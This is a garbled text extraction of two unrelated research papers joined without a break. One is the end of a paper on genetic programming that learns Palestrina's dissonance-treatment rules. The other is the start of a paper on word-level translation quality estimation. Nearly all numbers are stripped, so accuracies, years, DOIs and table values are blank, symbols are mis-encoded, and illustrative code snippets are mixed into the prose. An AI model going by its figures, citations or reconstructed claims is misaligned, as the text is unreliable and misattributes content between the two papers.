these numbers represent anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mostly a trade-off between accuracy of training/measurement and computation time, and we expect a similar performance if these values are changed within reasonable ranges. once all example sets have been constructed, each example receives a weight such that the total weight of the positive examples is . , and the total weight of each of the four sets of negative examples is . (within each set, the weights are the same for all examples). when measuring classification accuracy of a rule during the learning process, each positive example that is classified correctly counts + times the example weight, whereas each negative example that is erroneously classified as positive example counts − times the example weight. thus, the accuracy score is a number between − . and . , with . expected for a random classifier. please note that with a low probability a randomly generated negative example can be the same as a positive example. here, we consider this as a small amount of noise in the measurement, but for future experiments it is possible to filter these out at the expense of run time. learning process we use strongly typed gp as implemented in the python library deap (https://github. com/deap/deap) (fortin et al., ) with the types float and boolean (integers are translated to floats). the following functions can occur as parent nodes in the tree that represents a learnt rule. logical operators: _ (or), ^ (and), : (not), ! (implication), $ (equivalence) arithmetic operators and relations: þ, �, � (multiplication), = (division), � (unary minus), ¼, <, > conditional: if then elseðhbooleani, hfloati, hfloatiÞ terminal nodes in a ‘rule tree’ can be either input variables (like the duration of a note or the interval to its predecessor or successor) or ephemeral random constants (constants whose values can be changed by mutations). the following input variables can be used in the learnt rules: the duration of the dissonant note (durationi), its predecessor (durationi� ) and successor (durationiþ ); the normalised pitch class of the dissonance; the intervals between the dissonance and its predecessor (intervalpre) and successor (intervalsucc); and the accent weight of the dissonance (accentweighti). as for the ephemeral random constants, there are the boolean constants true and false, as well as integer constants in the form of values between and . the notation given here is the notation shown later in learnt rule examples. there are many choices of operators and parameters that can be used with gp. here, we follow standard approaches that are commonly used in the gp practitioners’ community, and/or are deap defaults, unless otherwise noted. the population is created using ramped half-and-half initialisation, after which at each generation the following operators are applied. for selection, we use tournament selection with a tournament size of . for mutation, there is a choice between three operators: standard random tree mutation ( % probability), a duplication operator that creates two copies of the tree and connects them using the ^ operator ( . %), and a similar duplication operator using the a melodic interval is always computed as the interval between a given note and its predecessor and positive when the next note is higher. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://github.com/deap/deap https://github.com/deap/deap http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ _ operator ( . %). for recombination, there is again a choice between standard tree exchange crossover ( %), an operator that returns the first individual unchanged, and a combination of the first and second individual using the ^ operator ( . %), and a similar operator using _ ( . %). while random tree mutation and tree exchange crossover are commonly used, we designed the other operators to encourage the emergence of rules that are conjunctions or disjunctions of more simple rules, which is a useful format for formal compositional rules. without these operators, it would be extremely unlikely that a new simple rule could be evolved without disrupting the already evolved one, or that different already evolved rules could be combined as a whole. a static depth limit of is imposed on the evolving trees to avoid stack overflows and exceedingly long execution times. a population of individuals is evolved for , generations. the fitness assigned to an individual is times its accuracy score (described above) minus . times the size of its tree. that way, among two rules with equal classification accuracy, the more compact rule has a slight fitness advantage. we introduced this as a measure to slow down the growth of the trees during evolution (known as ‘bloat control’ in the field of gp, although the effect of this particular measure is not very strong). we performed five runs for every cluster. they use the same set of learning examples, but find different rules nonetheless due to the stochastic nature of gp. after a run is finished, the best rule evolved in that run is output together with its classification accuracy scores . results quantitative evaluation the quality of the rule learning process as implemented by gp is evaluated by measuring the accuracies of the best evolved rules (see fig. ). it can be seen that the accuracies for positive examples are better than % in most cases, the accuracies on negative examples from other clusters are mostly better than %, the accuracies on negative examples without dissonances are mostly better than %, the accuracies on random counterexamples are close to %, and the accuracies for modified positive examples are mostly better than % but around % for the first cluster. when plotting overall accuracy scores against the sizes of the rules’ corresponding gp trees (fig. ), it can be seen that rules for the same cluster achieve similar accuracy scores despite different sizes. however, across clusters, there seems to be a negative correlation between accuracy and rule size. the most plausible explanation seems to be that larger clusters are more difficult to describe, resulting both in larger rule sizes and lower accuracy scores (fig. ). the accuracy of some negative examples (i.e. examples without dissonances, and modified positive examples) might be lower, because some of them may accidentally match the pattern of positive examples. qualitative evaluation we evaluated the suitability of the evolved rules for describing dissonances by using them as melodic constraints in small constraint problems implemented with the music constraint system cluster engine (http://github.com/tanders/clusterengine), which is a the evolved rules from all runs, together with their qualitative evaluatiuon, can be found in the file ‘resulting rules.pdf’ in the supplemental data, doi: . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://github.com/tanders/clusterengine https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure accuracies achieved by the champions of the genetic programming runs on the various parts of the training set. (a) postive examples; (b) counterexamples from other clusters; (c) harmonic counterexamples; (d) random counterexamples; (e) randomly modified positive examples. the means are indicated by blue bars. c –c denotes the clusters found by dbscan. these clusters correspond to different dissonance categories (see table ). c and c are two small clusters that were disregarded in the end (see discussion at the end of section ‘clustering results and discussion’ above). full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ revision of the solver pwmc (sandred, ). both these solvers are libraries of the visual programming and composition environment pwgl (laurson, kuuskankare & norilo, ). the constraint problems consist of only three notes with the middle note as the dissonance and surrounding rests as padding so that these notes can occur freely on any beat. for each learnt rule (five per cluster resulting from the five runs reported above) we generated random solutions (an arbitrary number). we examined these solutions in common music notation, and appraised how well they complied with the respective dissonance category. specifically, we checked whether the metric position and duration of the middle note (the dissonance) and the melodic intervals into and from this note are appropriate. figure accuracy score vs tree size for the evolved solutions from all runs. clusters are denoted by their respective numbers. full-size doi: . /peerj-cs. /fig- figure accuracy score (a) and tree size (b) vs cluster size. clusters are denoted by their respective numbers. full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for each cluster (dissonance category) at least one learnt rule constrains the treatment of the dissonant middle note in a way that either fully complies with the features of the corresponding positive examples (see table again), or is at least very close. in other words, this ‘best rule’ per cluster works either perfectly or at least rather well when used as a constraint for its dissonance category. table shows how accurate the best rule of each dissonance category is by reporting the greatest deviation found in any solution among a set of random solutions. the full qualitative evaluation results—together with the raw rule results—are available with the data provided with this paper (under resulting rules and evaluation). examples of learnt rules to give a better idea of the kind of rules learnt, figs. and show two examples. the rule of fig. constrains passing tones upwards and that of fig. suspensions on beat . these specific rules have been selected, because they are relatively short. both rules are the best out of their set of in the sense just discussed above, and the qualitative evaluation of their results is included in table . the rules generated by deap were slightly simplified manually and with mathematica, and translated into standard mathematical notation for clarity. 
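to give the flavour of such a rule in executable form, the sketch below recasts an upward passing-tone rule as a python predicate over the seven input variables. the thresholds are illustrative stand-ins suggested by the verbal analysis (weak beat, upward steps of at most two semitones, at most a half note); they are not the constants actually evolved by gp.

```python
# illustrative predicate form of an upward passing-tone rule over the seven gp input
# variables; thresholds are stand-ins, not the evolved constants.
def upward_passing_tone(duration_prev, duration_i, duration_next,
                        pitch_class_i, interval_pre, interval_succ, accent_weight_i):
    return (accent_weight_i < 0.5          # weak beat
            and 0 < interval_pre <= 2      # stepwise motion upwards into the dissonance
            and 0 < interval_succ <= 2     # stepwise motion upwards out of the dissonance
            and duration_i <= 2.0)         # at most a half note, in quarter-note lengths

# an eighth-note dissonance on an off-beat, approached and left by upward steps
print(upward_passing_tone(1.0, 0.5, 1.0, 2, 1, 2, 0.25))   # True
```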
table qualitative evaluation summary: greatest deviation found between features of positive examples (see table ) and solutions to best rule for each cluster. cluster category st interval nd interval metric position duration c passing tones down none none none none c passing tones up none none none none c suspension on beat none none none smalla c suspension on beat smallb none none smalla c lower neighbour tone smallc none none none notes: a rule also allows for eighth note (ideally it would only allow for a quarter or half note). b rule also allows for a minor second down (ideally it would only allow for pitch repetition). c rule also allows for a repetition (ideally it would only allow for a downward step). durationi− < durationi + ( ) ∧ accentweighti < . ( ) ∧ · accentweighti < durationi− ( ) ∧ accentweighti < intervalpre ( ) ∧ accentweighti < intervalsucc ( ) ∧ durationi < ( ) ∧ accentweighti · durationi+ < durationi ( ) ∧ intervalpre < ( ) ∧ intervalsucc < ( ) figure learnt rule example from c : passing tones upwards. full-size doi: . /peerj-cs. /fig- anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as an example, let us analyse the first rule, which constraints upwards passing tones (fig. ). the other rule in fig. can be analysed similarly. remember that for this dissonance category the dissonance occurs on a weak beat, both intervals lead upwards stepwise, and its duration is up to a half note (table ). this rule constrains all those aspects exactly (table ). the names of the input variables and their possible values have been explained above, but we will briefly revise them below for the reader’s convenience. note that the learnt rules contain some bloat—expressions that are irrelevant or redundant. in our analysis we will focus on the meaningful expressions of the rule. remember that each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. the dissonance occurs on the note with the index i, for example, accentweighti is the accent weight of the dissonance. the rule in fig. constrains dissonances to a weak beat. for the first beat of a measure, the accent weight is . , for the third beat in it is . , of the second and forth beat it is . and so on. the rule constrains accentweighti—the weight of the dissonance—to less than . , that is, to a weak beat, see line ( ) of the rule. the rule enforces that both the melodic interval into the dissonance and out of it, intervalpre and intervalsucc (measured in semitones) are positive (upwards). the rule happens to express this by constraining that these intervals are greater than accentweighti, see eqs. ( ) and ( ), and accentweighti is always greater than by its definition. both intervals are less than , see eqs. ( ) and ( ). so, in summary the intervals are positive (upwards), but at most two semitones (steps). the duration must be a half note or shorter. durations are measured in music ’s quarterlengths, where represents a quarter note. the duration of the dissonance must be less than , which corresponds to a dotted half note ( ), hence it can be a half note at most. discussion during the course of our project we gradually improved the resulting rules. the negative examples in the training set for the rule learning have a great impact on the accuracy of resulting rules. 
for example, the inclusion of slightly modified transformations of positive examples clearly improved the accuracy as compared to preliminary experiments. a closer investigation into the impact of automatically generated negative examples on the accuracy of resulting rules could lead to further improvement. for example, so far we only used slight random variations of the note durations and melodic intervals to ≥ |intervalsucc| ∧ accentweighti ≥ ∧ ( < durationi ∨ durationi− ≥ ) ∧ ( ≥ durationi ∨ durationi− < ) ∧ intervalpre < accentweighti ∧ intervalpre > intervalsucc figure learnt rule example from c : suspension on beat . full-size doi: . /peerj-cs. /fig- the variable names where introduced above when discussing terminal nodes in the subsection ‘learning process’ and their possible values earlier in the sub- section ‘data given to machine learning’. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generate negative examples, but variations of further parameters could also be useful (e.g. negative examples with shifted metric positions could also restrict syncopations). multiple rules learnt for the same cluster differ in their accuracy when used as a constraint for music generation: the music generated with these rules (during qualitative evaluation) can be more or less close to the features of the positive examples (see table ). table only reports the accuracy of the best rule per cluster. some other rules for the same cluster are much less accurate, but nevertheless obtain a very similar overall weighted score in the learning process. currently, we lack an algorithm for measuring the accuracy of a rule in terms of how similar generated music restricted by that rule is compared with its positive examples. such an algorithm would be very useful to contribute to the fitness calculation of rules during the learning process. the accuracy of resulting rules can also be improved by taking further background knowledge into account. for example, some resulting rules allow for syncopations in dissonance categories where these would not occur in palestrina, for example, at a passing tone. providing the rule learning algorithm with an extra boolean feature whether the dissonant note is syncopated or not will likely avoid that. a further improvement could probably be obtained by post-processing large clusters generated by dbscan with another clustering algorithm that is not based on density alone, or by dbscan with a smaller setting for maximum neighbour distance, to split them up into smaller clusters, for which learning a suitable rule should be easier. from the perspective of gp research, we demonstrate a simple yet powerful way of performing symbolic regression on heterogeneous data. a combination of gp and clustering is used to achieve that. these two techniques have occasionally been used together for various purposes. some similarity to our approach can be found in the work by kattan, agapitos & poli ( ), who use a top-level genetic programmming system to project data from a complex problem domain onto a two-dimensional space, then apply k-means clustering several times with different target cluster numbers to subdivide the problem set, then use the best clustering (as determined by a clustering quality measure) to run a lower level gp system on each cluster. 
this method was introduced against a background of techniques other than clustering that had already been applied to what is termed problem decomposition for gp. the authors demonstrate superior performance on a set of benchmarks problems against gp without clustering. later, kattan, fatima & arif ( ) extend this approach for event prediction in time series. by using a density based clustering algorithm, and applying it directly on the input data, we achieve something similar with a much simpler system. this is partly due to the fact that the density parameter is not difficult to set. of course, if it were more difficult to set, clustering quality metrics could also be used for that purpose along with the manual evaluation of clustering quality based on domain knowledge that we have applied here. conclusions human composition education and composition practice commonly combine guidance from compositional rules and insights learnt from musical examples. by contrast, while rule-based approaches on the one hand, and approaches based on ml on the other hand anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have been often employed in the field of algorithmic composition, these approaches have rarely been combined. in this paper, we propose a method that automatically extracts symbolic compositional rules from a music corpus. this method is based on gp, a ml technique using an evolutionary algorithm. the resulting rules can be analysed by humans or used in rule- based algorithmic composition systems. in this study, we extracted rules that detail the dissonance treatment in compositions by palestrina. we derived rules for the following five dissonance categories (automatically derived clusters): passing tones on a weak beat upwards and downwards; lower neighbour tones on a weak beat; and suspensions on the strong beat one and beat three in ‘metre’. learnt rules typically match between % and % of the positive training examples, while excluding between % and % of the counterexamples depending on counterexample category and cluster (dissonance category), with better results for smaller clusters. learnt rules describe melodic features of the dissonance categories very well, though some of the resulting best rules allow for minor deviations compared with the positive examples (e.g. allowing the dissonance category of suspension to occur on shorter notes as well). acknowledgements we want to thank dmitri tymoczko, who suggested the initial idea for an algorithm that detects dissonances in renaissance music. we are also grateful for the detailed and valuable feedback of two reviewers. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � torsten anders conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � benjamin inden conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: torsten anders, & benjamin inden. ( , october ). 
supplemental files for article: machine learning of symbolic compositional rules with genetic programming: dissonance treatment in palestrina. zenodo. doi . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references anders t, miranda er. . constraint programming systems for modeling music theories and composition. acm computing surveys ( ): – doi . / . . anglade a, dixon s. . characterisation of harmony with inductive logic programming. in: ismir. philadelphia, – . ariza c, cuthbert ms. . modeling beats, accents, beams, and time signatures hierarchically with music meter objects. in: proceedings of the international computer music conference, icmc , new york, usa. ann arbor: michigan publishing, – . baker d. . david baker’s jazz improvisation. revised edition. van nuys: alfred publishing. cuthbert ms, ariza c. . music : a toolkit for computer-aided musicology and symbolic music data. in: proceedings of the th international society for music information retrieval conference, ismir . utrecht: international society for music information retrieval, seaver institute, – . da palestrina gp. . le opere complete. per cura e studio di raffaele casimiri. vol. . rome: fratelli scalera. ebcioglu k. . computer counterpoint. in: proceedings of the international computer music conference . san francisco: international computer music association, – . ester m, kriegel h-p, sander j, xu x. . density-based algorithm for discovering clusters in large spatial databases with noise. in: proceedings of the second international conference on knowledge discovery and data mining (kdd- ). munich: aaai press, – . fernández jd, vico f. . ai methods in algorithmic composition: a comprehensive survey. journal of artificial intelligence research : – doi . /jair. . fortin f-a, de rainville f-m, gardner m-ag, parizeau m, gagné c. . deap: evolutionary algorithms made easy. journal of machine learning research ( ): – . fux jj. . the study of counterpoint. from johann joseph fux’s gradus ad parnassum. london: w.w. norton & company. orig. , translated and edited by alfred mann. hiller l, isaacson l. . musical composition with a high-speed digital computer. in: schwanauer sm, lewitt da, eds. machine models of music. cambridge: mit press, – reprint of original articel in journal of audio engineering society, . jeppesen k. . counterpoint: the polyphonic vocal style of the sixteenth century. new york: prentice-hall. trans. by g. haydon, dover reprint . jeppesen k. . the style of palestrina and the dissonance. second edition. new york: oxford university press. trans. by e. j. dent, dover reprint . johanson b, poli r. . gp-music: an interactive genetic programming system for music generation with automated fitness raters. technical report csrp- - , university of birmingham. kattan a, agapitos a, poli r. . unsupervised problem decomposition using genetic programming. in: esparcia-alcazar ai, ekart a, silva s, dignum s, uyar as, eds. european conference on genetic programming, istanbul, turkey. berlin: springer-verlag, – . kattan a, fatima s, arif m. . time-series event-based prediction: an unsupervised learning framework based on genetic programming. information sciences : – doi . /j.ins. . . . koza jr. . genetic programming: on the programming of computers by means of natural selection. cambridge: mit press. krumhansl cl. . cognitive foundations of musical pitch. new york: oxford university press. 
laurson m, kuuskankare m, norilo v. . an overview of pwgl, a visual programming environment for music. computer music journal ( ): – doi . /comj. . . . . morales e, morales r. . learning musical rules. in: widmer g, ed. proceedings of the ijcai- international workshop on artificial intelligence and music, th international joint conference on artificial intelligence (ijcai- ), menlo park, ca, usa. montreal: american association for artificial intelligence, – . muggleton s, de raedt l, poole d, bratko i, flach p, inoue k, srinivasan a. . ilp turns . machine learning ( ): – doi . /s - - - . patrick ph, strickler k. . a computer-assisted study of dissonance in the masses of josquin desprez. computers and the humanities ( ): – doi . /bf . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . poli r, langdon wb, mcphee nf. . a field guide to genetic programming. morrisville, nc: lulu.com. ramirez r, perez a, kersten s, rizo d, roman p, inesta jm. . modeling violin performances using inductive logic programming. intelligent data analysis ( ): – doi . /ida- - . sandred Ö. . pwmc, a constraint-solving system for generating music scores. computer music journal ( ): – doi . /comj. . . . . sapp cs. . computational methods for the analysis of musical structure. phd thesis, stanford university. schmidt m, lipson h. . distilling free-form natural laws from experimental data. science ( ): – doi . /science. . schottstaedt w. . automatic counterpoint. in: mathews mv, pierce jr, eds. current directions in computer music research. cambridge: the mit press, – . sigler a, wild j, handelman e. . schematizing the treatment of dissonance in th-century counterpoint. in: proceedings of the th international society for music information retrieval conference, ismir . málaga, – . spector l, alpern a. . criticism, culture, and the automatic generation of artworks. in: proceedings of the twelfth national conference on artificial intelligence, aaai- . seattle, – . tobudic a, widmer g. . relational ibl in music with a new structural similarity measure. in: proceedings of the international conference on inductive logic programming. szeged: springer, – .
pushing the limits of translation quality estimation andré f. t.
martins unbabel instituto de telecomunicações lisbon, portugal andre.martins@unbabel.com marcin junczys-dowmunt adam mickiewicz university in poznań poznań, poland junczys@amu.edu.pl fabio n. kepler unbabel l f/inesc-id, lisbon, portugal university of pampa, alegrete, brazil kepler@unbabel.com ramón astudillo unbabel l f/inesc-id lisbon, portugal ramon@unbabel.com chris hokamp dublin city university dublin, ireland chokamp@computing.dcu.ie roman grundkiewicz adam mickiewicz university in poznań poznań, poland romang@amu.edu.pl abstract translation quality estimation is a task of growing importance in nlp, due to its poten- tial to reduce post-editing human effort in dis- ruptive ways. however, this potential is cur- rently limited by the relatively low accuracy of existing systems. in this paper, we achieve remarkable improvements by exploiting syn- ergies between the related tasks of word-level quality estimation and automatic post-editing. first, we stack a new, carefully engineered, neural model into a rich feature-based word- level quality estimation system. then, we use the output of an automatic post-editing sys- tem as an extra feature, obtaining striking re- sults on wmt : a word-level f mult score of . % (an absolute gain of + . % over the current state of the art), and a pearson correla- tion score of . % for sentence-level hter prediction (an absolute gain of + . %). introduction the goal of quality estimation (qe) is to evaluate a translation system’s quality without access to ref- erence translations (blatz et al., ; specia et al., ). this has many potential usages: informing an end user about the reliability of translated con- tent; deciding if a translation is ready for publish- ing or if it requires human post-editing; highlighting the words that need to be changed. qe systems are particularly appealing for crowd-sourced and pro- fessional translation services, due to their potential to dramatically reduce post-editing times and to save labor costs (specia, ). the increasing interest in this problem from an industrial angle comes as no surprise (turchi et al., ; de souza et al., ; martins et al., ; kozlova et al., ). in this paper, we tackle word-level qe, whose goal is to assign a label of ok or bad to each word in the translation (figure ). past approaches to this problem include linear classifiers with handcrafted features (ueffing and ney, ; biçici, ; shah et al., ; luong et al., ), often combined with feature selection (avramidis, ; beck et al., ), recurrent neural networks (de souza et al., ; kim and lee, ), and systems that com- bine linear and neural models (kreutzer et al., ; martins et al., ). we start by proposing a “pure” qe system (§ ) consisting of a new, carefully en- gineered neural model (neuralqe), stacked into a linear feature-rich classifier (linearqe). along the way, we provide a rigorous empirical analysis to better understand the contribution of the several groups of features and to justify the architecture of the neural system. a second contribution of this paper is bring- ing in the related task of automatic post-editing (ape; simard et al. ( )), which aims to au- transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. source the sharpen tool sharpens areas in an image . mt der schärfen-werkezug bereiche in einem bild schärfer erscheint . 
pe (reference) mit dem scharfzeichner können sie einzelne bereiche in einem bild scharfzeichnen . qe bad bad ok ok ok ok bad bad ok ‖ hter = . % figure : example from the wmt word-level qe training set. shown are the english source sentence, the german translation (mt), its manual post-edition (pe), and the conversion to word quality labels made with the tercom tool (qe). words labeled as ok are shown in green, and those labeled as bad are shown in red. we also show the hter (fraction of edit operations to produce pe from mt) computed by tercom. tomatically correct the output of machine transla- tion (mt). we show that a variant of the ape sys- tem of junczys-dowmunt and grundkiewicz ( ), trained on a large amount of artificial “roundtrip translations,” is extremely effective when adapted to predict word-level quality labels (yielding apeqe, § ). we further show that the pure and the ape- based qe system are highly complementary (§ ): a stacked combination of linearqe, neuralqe, and apeqe boosts the scores even further, leading to a new state of the art on the wmt and wmt datasets. for the latter, we achieve an f mult score of . %, which represents an absolute improvement of + . % over the previous best system. finally, we provide a simple word-to-sentence conversion to adapt our system to sentence-level qe. this results in a new state of the art for human- targeted translation error rate (hter) prediction, where we obtain a pearson’s r correlation score of . % (+ . % absolute gain), and for sentence ranking, which achieves a spearman’s ρ correlation score of . % (+ . %). we complement our findings with error analysis that highlights the syn- ergies between pure and ape-based qe systems. datasets and system architecture datasets. for developing and evaluating our sys- tems, we use the datasets listed in table . these datasets have been used in the qe and ape tasks in wmt – (bojar et al., , ). they span two language pairs (english-spanish and english-german) and two different domains (news translations and information technology). we used the standard train, development and test splits. each split contains the source and automatically trans- lated sentences (which we use as inputs), the manu- publicly available at http://www.statmt.org/ wmt and http://www.statmt.org/wmt . ally post-edited sentences (output for the ape task), and a sequence of ok/bad quality labels, one per each translated word (output for the word-level qe task); see figure . besides these datasets, for training the ape system we make use of artificial roundtrip translations; this will be detailed in § . evaluation. for all experiments, we report the of- ficial evaluation metrics of each dataset’s year. for wmt , the official metric for the word-level qe task is the f score of the bad labels (f bad ). for wmt , it is the product of the f scores for the ok and bad labels (denoted f mult ). for sentence- level qe, we report the pearson’s r correlation for hter prediction and the spearman’s ρ correlation score for sentence ranking (graham, ). from post-edited sentences to quality labels. in the datasets above, the word quality labels are ob- tained automatically by aligning the translated and the post-edited sentence with the tercom soft- ware tool (snover et al., ) , with the default settings (tokenized, case insensitive, exact matching only, shifts disabled). this tool computes the hter (the normalized edit distance) between the translated and post-edited sentence. 
as a by-product, it aligns the words in the two sentences, identifying substitution errors, word deletions (i.e. words omitted by the translation system), and insertions (redundant words in the translation). words in the mt output that need to be edited are marked by the bad quality labels. (tercom is available at http://www.cs.umd.edu/~snover/tercom.)

the fact that the quality labels are automatically obtained from the post-edited sentences is not just an artifact of these datasets, but a procedure that is highly convenient for developing qe systems in an industrial setting. manually annotating word-level quality labels is time-consuming and expensive; on the other hand, post-editing translated sentences is commonly part of the workflow of crowd-sourced and professional translation services. thus, getting quality labels for free from sentences that have already been post-edited is a much more realistic and sustainable process.

table : datasets used in this work.
dataset | language pair | # sents | # words
wmt , train | en-es | , | ,
wmt , dev | en-es | , | ,
wmt , test | en-es | , | ,
wmt , train | en-de | , | ,
wmt , dev | en-de | , | ,
wmt , test | en-de | , | ,

this observation suggests that we can tackle word-level qe in two ways:

1. pure qe: run the ter alignment tool (i.e. tercom) on the post-edited data, and then train a qe system directly on the generated quality labels;
2. ape-based qe: train an ape system on the original post-edited data, and at runtime use the ter alignment tool to convert the automatically post-edited sentences to quality labels.

from a machine learning perspective, qe is a sequence labeling problem (i.e., whose output sequence has a fixed length and a small number of labels), while ape is a sequence-to-sequence problem (where the output is of variable length and spans a large vocabulary). therefore, we can regard ape-based qe as a "projection" of a more complex and fine-grained output (ape) into a simpler output space (qe). ape-based qe systems have the potential for being more powerful since they are trained with this finer-grained information (provided there is enough training data to make them generalize well). we report results in § confirming this hypothesis.

our system architecture, described in full detail in the following sections, consists of state of the art pure qe and ape-based qe systems, which are then combined to yield a new, more powerful, qe system.

pure quality estimation

the best performing system in the wmt word-level qe task was developed by the unbabel team (martins et al., ). it is a pure but rather complex qe system, ensembling a linear feature-based classifier with three different neural networks with different configurations. in this section, we provide a simpler version of their system, by replacing the three ensembled neural components by a single one, which we engineer in a principled way. we evaluate the resulting system on additional data (wmt in addition to wmt ), covering a new language pair and a new content type. overall, we obtain a slightly higher accuracy with a much simpler system. in this section, we describe the linear (§ . ) and neural (§ . ) components of our system, as well as their combination (§ . ).

. linear sequential model

we start with the linear component of our model, a discriminative feature-based sequential model (called linearqe), based on martins et al. ( ). the system receives as input a tuple 〈s,t,a〉, where s = s1 ... sM is the source sentence, t = t1 ... tN is the translated sentence, and a ⊆ {(m,n) | 1 ≤ m ≤ M, 1 ≤ n ≤ N} is a set of word alignments.
it predicts as output a sequence ŷ = y1 ... yN, with each yi ∈ {bad, ok}. this is done as follows:

$$\hat{y} = \arg\max_{y} \; \sum_{i=1}^{N} w^{\top}\phi_{u}(s,t,a,y_{i}) \;+\; \sum_{i=1}^{N+1} w^{\top}\phi_{b}(s,t,a,y_{i},y_{i-1}). \qquad (1)$$

above, w is a vector of weights, φu(s,t,a,yi) are unigram features (depending only on a single output label), φb(s,t,a,yi,yi−1) are bigram features (depending on consecutive output labels), and y0 and yN+1 are special start/stop symbols.

features. table shows the unigram and bigram features used in the linearqe system. like the baseline systems provided in wmt / , we include features that depend on the target word and its aligned source word, as well as the context surrounding them. (features involving the aligned source word are replaced by nil if the target word is unaligned; if there are multiple aligned source words, they are concatenated into a single feature.) a distinctive aspect of our system is the inclusion of syntactic features, which will show to be useful to detect grammatically incorrect constructions. we use features that involve the dependency relation, the head word, and second-order sibling and grandparent structures. features involving part-of-speech (pos) tags and syntactic information are obtained with turbotagger and turboparser (martins et al., ; http://www.cs.cmu.edu/~ark/turboparser).

table : features used in the linearqe system (see martins et al., for a detailed description). features marked with * are included in the wmt baseline system; those marked with † were proposed by kreutzer et al. ( ).
unigram (yi ∧ ...): *bias; *word, leftword, rightword; *sourceword, sourceleftword, sourcerightword; *largestngramleft/right, sourcelargestngramleft/right; *postag, sourcepostag; †word+leftword, word+rightword; †word+sourceword, postag+sourcepostag
simple bigram (yi ∧ yi−1 ∧ ...): *bias
rich bigrams (yi ∧ yi−1 ∧ ... and yi+1 ∧ yi ∧ ...): all of the above; word+sourceword, postag+sourcepostag
syntactic (yi ∧ ...): deprel, word+deprel; headword/postag+word/postag; leftsibword/postag+word/postag; rightsibword/postag+word/postag; grandword/postag+headword/postag+word/postag

training. the feature weights are learned by running epochs of the max-loss mira algorithm (crammer et al., ), with regularization constant c ∈ {10^(−k)} and a hamming cost function placing a higher penalty on false positives than on false negatives (cfp ∈ { . , . , ..., . }, cfn = 1 − cfp), to account for the existence of fewer bad labels than ok labels in the data. these values are tuned on the development set.

results and feature contribution. table shows the performance of the linearqe system. to help understand the contribution of each group of features, we evaluated different variants of the linearqe system on the development sets of wmt / . as expected, the use of bigrams improves the simple unigram model, and the syntactic features help even further. (while syntactic features have been used previously in sentence-level qe (rubino et al., ), they have never been applied to the finer-grained word-level variant tackled here.)

table : performance on the wmt (en-es) and wmt (en-de) development sets of several configurations of linearqe. we report the official metric for these shared tasks, f bad for wmt and f mult for wmt .
configuration | wmt (f bad) | wmt (f mult)
unigrams only | . | .
+simple bigram | . | .
+rich bigrams | . | .
+syntactic (full) | . | .
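as an aside, decoding under equation (1) reduces to a standard viterbi search over the two labels, since the score factors over unigram and consecutive-label bigram features. the sketch below is illustrative only and is not taken from the original implementation: it assumes the feature scores have already been collapsed into per-position unigram scores and a 2×2 transition matrix, and the function and variable names are ours.

```python
import numpy as np

def viterbi_ok_bad(unigram_scores, bigram_scores):
    """Exact decoding for a two-label (OK/BAD) sequence model.

    unigram_scores: array of shape (N, 2), the unigram score per position/label.
    bigram_scores:  array of shape (2, 2), the bigram score for each
                    (previous label, current label) pair; start/stop symbols
                    are handled implicitly here for simplicity.
    Returns the highest-scoring label sequence (0 = OK, 1 = BAD).
    """
    n_pos, n_labels = unigram_scores.shape
    delta = np.zeros((n_pos, n_labels))            # best score ending in each label
    backptr = np.zeros((n_pos, n_labels), dtype=int)

    delta[0] = unigram_scores[0]                   # first position: unigram only
    for i in range(1, n_pos):
        for y in range(n_labels):
            cand = delta[i - 1] + bigram_scores[:, y] + unigram_scores[i, y]
            backptr[i, y] = int(np.argmax(cand))
            delta[i, y] = cand[backptr[i, y]]

    # follow back-pointers from the best final label
    best = [int(np.argmax(delta[-1]))]
    for i in range(n_pos - 1, 0, -1):
        best.append(backptr[i, best[-1]])
    return list(reversed(best))

# toy usage: three target words, scores favouring OK, OK, BAD
labels = viterbi_ok_bad(np.array([[2.0, 0.1], [1.5, 0.2], [0.1, 1.8]]),
                        np.array([[0.3, -0.1], [-0.1, 0.3]]))
print(labels)  # [0, 0, 1]
```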
the impact of these features is more prominent in wmt : the rich bigram features lead to scores about points above a sequential model with a single indicator bigram feature, and the syntactic features contribute another . points. the net improvement exceeds points over the unigram model.

. neural system

